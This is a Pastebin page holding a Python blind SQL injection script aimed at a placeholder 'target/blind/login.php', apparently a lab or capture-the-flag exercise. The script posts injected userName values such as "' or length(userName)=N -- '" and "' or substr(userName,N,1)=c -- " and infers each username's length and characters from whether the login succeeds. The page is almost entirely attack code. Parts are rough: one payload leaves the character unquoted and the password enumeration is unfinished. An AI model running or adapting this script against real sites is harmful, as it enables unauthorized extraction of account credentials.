Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3
- import requests
- from string import ascii_letters
- from string import digits
- import code
- from urllib.request import urlopen
- from bs4 import BeautifulSoup
- from bs4 import Comment
- import sys, getopt
- MAX_FIELD_LENGTH = 24
- username_char = ascii_letters + digits
- password_char = ascii_letters + digits
- def get_answer(params):
- r = requests.post('http://target/blind/login.php', data=params)
- bsObj = BeautifulSoup(r.text, features="lxml")
- if bsObj.find('div', {'class':'message'}).text == "You are successfully authenticated!":
- return True
- else:
- return False
- username = ''
- password = ''
- count = 0
- length = 1
- user_lengths = []
- password_lengths = []
- users = {}
- while length != 9:
- params = {'userName': "' or length(userName)="+ str(length) + " -- '", 'password': ''}
- auth = get_answer(params)
- if auth == True:
- print('Username Length: ' + str(length))
- user_lengths.append(length)
- length += 1
- length = 1
- while length != 9:
- chars = []
- for c in username_char:
- params = {'userName': "' or substr(userName," + str(length) + ", 1)=" + c + " -- ", 'password': ''}
- auth = get_answer(params)
- if auth == True:
- chars.append(c)
- users[length] = chars
- length += 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
